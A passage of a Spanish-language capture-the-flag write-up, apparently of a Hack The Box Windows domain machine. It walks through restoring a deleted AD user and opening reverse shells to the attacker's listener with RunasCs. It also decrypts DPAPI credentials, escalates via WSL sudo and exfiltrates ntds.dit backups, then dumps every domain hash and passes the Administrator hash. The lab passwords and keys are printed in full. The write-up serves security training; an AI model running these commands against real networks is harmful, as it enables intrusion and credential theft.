dSCorePropagationData           : {5/13/2025 4:11:10 PM, 1/29/2025 4:52:29 AM, 1/29/2025 4:49:29 AM, 1/29/2025 1:08:06 
                                  AM...}
givenName                       : Todd
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Second-Line Support Technicians,DC=voleur,DC=htb
lastLogoff                      : 0
lastLogon                       : 133826301603754403
lastLogonTimestamp              : 133826287869758230
logonCount                      : 3
memberOf                        : {CN=Second-Line Technicians,DC=voleur,DC=htb, CN=Remote Management 
                                  Users,CN=Builtin,DC=voleur,DC=htb}
Modified                        : 5/13/2025 4:11:17 PM
modifyTimeStamp                 : 5/13/2025 4:11:17 PM
msDS-LastKnownRDN               : Todd Wolfe
Name                            : Todd Wolfe
                                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : 
ObjectClass                     : user
ObjectGUID                      : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid                       : S-1-5-21-3927696377-1337352550-2781715495-1110
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133826280731790960
sAMAccountName                  : todd.wolfe
sDRightsEffective               : 0
sn                              : Wolfe
userAccountControl              : 66048
userPrincipalName               : todd.wolfe@voleur.htb
uSNChanged                      : 45088
uSNCreated                      : 12863
whenChanged                     : 5/13/2025 4:11:17 PM
whenCreated                     : 1/29/2025 1:08:06 AM



PS C:\Windows\system32>

Ejecutamos Restore-ADObject especificando el GUID del usuario. Verificamos que el usuario se restauro con Get-ADUser.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

PS C:\Windows\system32> Restore-ADObject -Identity "1c6b1deb-c372-4cbb-87b1-15031de169db"
PS C:\Windows\system32> Get-ADUser -Identity todd.wolfe


DistinguishedName : CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
Enabled           : True
GivenName         : Todd
Name              : Todd Wolfe
ObjectClass       : user
ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db
SamAccountName    : todd.wolfe
SID               : S-1-5-21-3927696377-1337352550-2781715495-1110
Surname           : Wolfe
UserPrincipalName : todd.wolfe@voleur.htb



PS C:\Windows\system32>

User - Todd Wolfe

Con la contrasena encontrada en el archivo XLSX ejecutamos una shell para Todd.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe todd.wolfe NightT1meP1dg3on14 whoami
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

voleur\todd.wolfe
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe todd.wolfe NightT1meP1dg3on14 powershell.exe -r 10.10.14.76:1335
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-10f6c7$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4400 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

Todd pertenece al grupo Second-Line Technicians.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.76] from voleur.htb [10.10.11.76] 55384
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\todd.wolfe
PS C:\Windows\system32> whoami /all
whoami /all

USER INFORMATION
----------------

User Name         SID                                           
================= ==============================================
voleur\todd.wolfe S-1-5-21-3927696377-1337352550-2781715495-1110


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes                                        
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                        Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
VOLEUR\Second-Line Technicians             Group            S-1-5-21-3927696377-1337352550-2781715495-1113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
PS C:\Windows\system32>

En el directorio C:\IT\ existen tres carpetas Todd tiene acceso a Second-Line Support lo cual se relaciona al grupo del mismo nombre.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

*Evil-WinRM* PS C:\> dir C:\IT


    Directory: C:\IT


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         1/29/2025   1:40 AM                First-Line Support
d-----         1/29/2025   7:13 AM                Second-Line Support
d-----         1/30/2025   8:11 AM                Third-Line Support


*Evil-WinRM* PS C:\>

Windows Credentials Manager

Tras explorar el directorio descubrimos archivo Key y Credential.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> dir AppData\Roaming\Microsoft\Protect\
dir AppData\Roaming\Microsoft\Protect\


    Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-         1/29/2025   7:13 AM                S-1-5-21-3927696377-1337352550-2781715495-1110                       


PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> dir appdata\roaming\microsoft\credentials
dir appdata\roaming\microsoft\credentials


    Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\appdata\roaming\microsoft\credentials


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         1/29/2025   4:55 AM            398 772275FAD58525253490A9B0039791D3                                     


PS C:\IT\Second-Line Support\Archived Users\todd.wolfe>

Codificamos la master key en base64.

1
2
3
4

# master key
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88'))
AgAAAAAAAAAAAAAAMAA4ADkANAA5ADMAOAAyAC0AMQAzADQAZgAtADQAYwA2ADMALQBiADkAMwBjAC0AYwBlADUAMgBlAGYAYwAwAGEAYQA4ADgAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAASAWcret5vHz2ZFDJGrnZI1BGAAAJgAAAA2YAAANcj1B/jylUhNcSe+UibSS+B7/bdiHKg/fYSD6cibplaMd3Y4zsjKqsVTKcNtLlcdFUHq1DuFNs3RIWP+bmweMuDU8cufImoeLTlQpIYdMh+W9gPmEl8K4uE7aQE3Yw5XcATlxytrmIAgAAAB7vnBVPlWNLbxgEAtZNEf5QRgAACYAAAANmAABK1OOpu3KshUr3dLNdcY8yUp0/QCvW9RyADda8JEaf/e2Qbn8XnQuQPb/7LENveEXSO4R2DsxXLXCs4ban1JazinCCqkvrWW0CAAAAAAEAAFgAAACEizqYyco/TqsQ3rgf7i9DSOaEVnONX4KQQG5p9lFlW0/lt1Tnj0do7kUF1rtUFAHLJCLhNsUpKRlyquQSSM0FnaIPoACBXWAUQ8P1KLfVosXGHH5zx9BwP8S+SjguDL3ipMNTWgTbAxzMB6wei02C/GjW4TTqZz6d/ENfJi79Quwp48np4xmtDOMKfNBKdPGdHIBSeJBJ90SpBN/sFHoveguRpfGmcJVpE4P/2yZWHcHSlTXxx1bF2GR/N32eLVzlDW8U0jiqZXz+GAxZPJcXVZzcwJCnQ86b5WV9YBrXq3d5gyGPGWgx3cryZPMR+03CQtT41lxN4CfgfD59crbmN5sMZCp6KG5RyRs3J1k0BXwLy8Ri33WwYhOUCCi9pSj1y3vvwqmAV4v1UydH0PXPlH+39e2oB2487UTGGdlyaQgs0YW7H5gWzc92ZrcTK1TXBO6ln7meBvmkT1RuqEZHHTpfWoKJFHs=
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe>

Asi como tambien el archivo credential.

1
2
3
4

# credential
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe> [Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\IT\Second-Line Support\Archived Users\todd.wolfe\appdata\roaming\microsoft\credentials\772275FAD58525253490A9B0039791D3'))
AQAAAIIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAgpOUCE8TY0y5PM5S78CqiAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAAFHzKgn3YLCvJj2rEPIQnU0AAAAABIAAAKAAAAAQAAAAQ5Eg3TZk1WowkapUa9UM/8AAAABPVx6LdEsEI0F7djLz0Hln/QVDHquvAyiJU8l7uAu9Lyz7xRKASqN6wciIci6VUdYEoKCYs0WZrs0QDAcwBzCNLLBuJd8XmtwjUg3CJ8qPoP6iWvn2iuNWY4f0DyFyLVvJ99Y+oDnMOwRWZVbuALaPzH7dalRoH/Bfcp2mHYwHF49CPkhEcBkUdWc8EDapERM1oko6oGxKhX+vSiB5CMRhhWHIQI0Zso+/ynQrQe/Og3R1pZjBZQtugVQOqAcnf5cUAAAAIVzGEtY4B9mi4fsWOVfrBp0oItY=
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe>

Creamos ambos archivos localmente.

1
2
3
4
5
6

echo AgAA[..]meBvmkT1RuqEZHHTpfWoKJFHs= |base64 -d > 08949382-134f-4c63-b93c-ce52efc0aa88
echo AQAAAIIBA[..]9mi4fsWOVfrBp0oItY= |base64 -d > 772275FAD58525253490A9B0039791D3
❯ ll
.rw-rw-r-- kali kali 740 B Sun Jul  6 03:28:12 2025  08949382-134f-4c63-b93c-ce52efc0aa88
.rw-rw-r-- kali kali 398 B Sun Jul  6 03:28:17 2025  772275FAD58525253490A9B0039791D3

DPAPI Secrets

Ejecutamos impacket-dpapi con la action de masterkey especificando el archivo master key, el SID y la contrasena, en este caso la de Todd.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

❯ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Nuevamente ejecutamos esta vez con el action credential especificando el archivo y la key. Se muestra las credenciales de jeremi.combs.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

❯ impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

User - Jeremy.Combs

Conociendo la contrasena de Jeremy ejecutamos RunasCs.

1
2
3
4
5
6
7

*Evil-WinRM* PS C:\users\svc_winrm\documents> .\RunasCs.exe jeremy.combs qT3V9pLXyN7W4m powershell.exe -r 10.10.14.76:1335
[*] Warning: The logon for user 'jeremy.combs' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1ef3db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 6084 created in background.
*Evil-WinRM* PS C:\users\svc_winrm\documents>

Logramos obtener una shell.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.76] from voleur.htb [10.10.11.76] 60232
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
voleur\jeremy.combs
PS C:\Windows\system32>

Jeremy pertenece al grupo THIRD-LINE TECHNICIANS por lo que es posible acceder al directorio del mismo nombre en C:\IT.

image

Dentro del directorio encontramos una nota que indica la existencia de WSL en la maquina. El directorio Backups\ no es accesible por este usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

PS C:\IT\Third-Line Support> dir


    Directory: C:\IT\Third-Line Support


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         1/30/2025   8:11 AM                Backups                                                              
-a----         1/30/2025   8:10 AM           2602 id_rsa                                                               
-a----         1/30/2025   8:07 AM            186 Note.txt.txt                                                         


PS C:\IT\Third-Line Support> cat Note.txt.txt
Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin
PS C:\IT\Third-Line Support>

Tambien, econtramos una clave privada que segun los permisos probablemente sea del usuario svc_backup.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

PS C:\IT\Third-Line Support> icacls id_rsa
id_rsa NT AUTHORITY\SYSTEM:(I)(F)
       VOLEUR\Third-Line Technicians:(I)(RX)
       VOLEUR\Administrator:(I)(F)
       BUILTIN\Administrators:(I)(F)
       VOLEUR\svc_backup:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
PS C:\IT\Third-Line Support> cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqFyPMvURW/qbyRlemAMzaPVvfR7JNHznL6xDHP4o/hqWIzn3dZ66
P2absMgZy2XXGf2pO0M13UidiBaF3dLNL7Y1SeS/DMisE411zHx6AQMepj0MGBi/c1Ufi7
[...]
fosiR4pvDHtzbqPVbixqSP14oKRSeswpN1Q50OnD11tpIbesjH4ZVEXv7VY9/Z8VcooQLW
GSgUcaD+U9Ik13vlNrrZYs9uJz3aphY6Jo23+7nge3Ui7ADEvnD3PAtzclU3xMFyX9Gf+9
RveMEYlXZqvJ9PAAAADXN2Y19iYWNrdXBAREMBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
PS C:\IT\Third-Line Support>

User - svc_backup

Con la clave privada y especificando el puerto logramos el acceso por SSH.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

❯ ssh -i id_rsa svc_backup@voleur.htb -p 2222
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul  6 10:35:00 PDT 2025

  System load:    0.52      Processes:             9
  Usage of /home: unknown   Users logged in:       0
  Memory usage:   47%       IPv4 address for eth0: 10.10.11.76
  Swap usage:     0%


363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Jul  6 09:51:05 2025 from 127.0.0.1
 * Starting OpenBSD Secure Shell server sshd
   ...done.
svc_backup@DC:~$ whoami;id;pwd
svc_backup
uid=1000(svc_backup) gid=1000(svc_backup) groups=1000(svc_backup),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev)
/home/svc_backup
svc_backup@DC:~$

Este usuario puede ejecutar cualquier comando como root.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

svc_backup@DC:~$ sudo -l -l
Matching Defaults entries for svc_backup on DC:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User svc_backup may run the following commands on DC:

Sudoers entry:
    RunAsUsers: ALL
    RunAsGroups: ALL
    Commands:
	ALL

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
	ALL
svc_backup@DC:~$

Backups

Tras actualizar a una shell privilegiada encontramos que es posible acceder a Backups\ donde se observa una copia de la base de datos de Active Directory junto con SECURITY y SYSTEM.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

root@DC:/# ls -lahR /mnt/c/IT/'Third-Line Support'/Backups/
'/mnt/c/IT/Third-Line Support/Backups/':
total 0
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 08:11  .
dr-xr-xr-x 1 svc_backup svc_backup 4.0K Jan 30 08:11  ..
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49  registry

'/mnt/c/IT/Third-Line Support/Backups/Active Directory':
total 25M
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup  24M Jan 30 03:49 ntds.dit
-rwxrwxrwx 1 svc_backup svc_backup  16K Jan 30 03:49 ntds.jfm

'/mnt/c/IT/Third-Line Support/Backups/registry':
total 18M
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 03:49 .
drwxrwxrwx 1 svc_backup svc_backup 4.0K Jan 30 08:11 ..
-rwxrwxrwx 1 svc_backup svc_backup  32K Jan 30 03:30 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup  18M Jan 30 03:30 SYSTEM
root@DC:/#

Comprimimos el directorio en un archivo .tar.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

root@DC:/# tar -cvf /home/svc_backup/Backups.tar "/mnt/c/IT/Third-Line Support/Backups/"
tar: Removing leading `/' from member names
/mnt/c/IT/Third-Line Support/Backups/
/mnt/c/IT/Third-Line Support/Backups/Active Directory/
/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit
/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.jfm
/mnt/c/IT/Third-Line Support/Backups/registry/
/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY
/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM
root@DC:/# ls -lah /home/svc_backup/Backups.tar
-rw-r--r-- 1 root root 42M Jul  6 10:43 /home/svc_backup/Backups.tar
root@DC:/#

Realizamos la copia de este por medio de scp.

1
2
3

❯ scp -P 2222 -i id_rsa svc_backup@voleur.htb:/home/svc_backup/Backups.tar $(pwd)
Backups.tar                                                                                                                                           100%   42MB   1.3MB/s   00:33

Dump Hashes

Ejecutamos impacket-secretsdump especificando system, security y ntds logrando obtener el hash de todos los usuarios, incluyendo administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70

❯ impacket-secretsdump -system registry/SYSTEM -security registry/SECURITY -ntds Active\ Directory/ntds.dit local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM 
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from Active Directory/ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up...

User - Administrator

Comprobamos que el hash es funcional.

1
2
3
4

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u administrator -H e656e07c56d831611b577b160b259ad2 -k
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\administrator:e656e07c56d831611b577b160b259ad2 (Pwn3d!)

A traves de un ticket logramos el acceso por WinRM y a la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/administrator -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in administrator.ccache
export KRB5CCNAME=administrator.ccache
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
                                        
